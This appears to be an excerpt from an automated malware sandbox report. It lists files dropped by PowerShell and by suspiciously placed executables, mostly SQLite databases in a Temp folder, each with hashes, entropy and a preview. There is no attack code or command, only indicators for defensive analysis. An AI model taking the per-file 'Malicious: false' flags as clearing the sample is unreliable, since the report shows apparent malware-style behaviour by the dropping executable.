Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmxzq1xs.nwc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwqonxtz.3bb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yk1xckew.hm2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\a7OlxXngyU

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aatb8W3AVz

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\azQhB4PR3o

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b7kPgNYFFk

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bCCTvNkQTx

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bbxmKKxpE2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c1Er4KmbKS

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c58700x8F4

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cBpcSD1VIf

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chBRvlN2pN

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cm36ikub3D

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cpTnsZrZb1

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dx8jlJEC0k

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eCPcRVRxpJ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eNkwjJcxXw

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eW6uZazJXy

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ew9IvAgd6M

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fdkcavdr7y

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fnCwLCJQmV

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gDT3vrmrV2

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:YSz2RSOn:YBX
MD5:	7E6639B54421953A8A81890714190577
SHA1:	2D6E2FBFE71B84331A50AC9F7F2346693D5A41B7
SHA-256:	6D2A2EFB7B8A8BD5A0F551B96FF1FAD77946E6B9F6340611AE29202783DC5514
SHA-512:	B6E72ED2C23B985212BBD5C24C21D3D93119387D498E792E9BE398BCABB183CB3E74BFE300170D477B8399AAA5C693DA2FF7343B798C5CA19896E7D7C53AC15D
Malicious:	false
Preview:	DRW1fSoe7pJPPEEsVj4wwFY5T

C:\Users\user\AppData\Local\Temp\gTOsexUiK1

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gXS2ycUMdm

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hJYEefI0vU

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hcJYj0mMmy

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
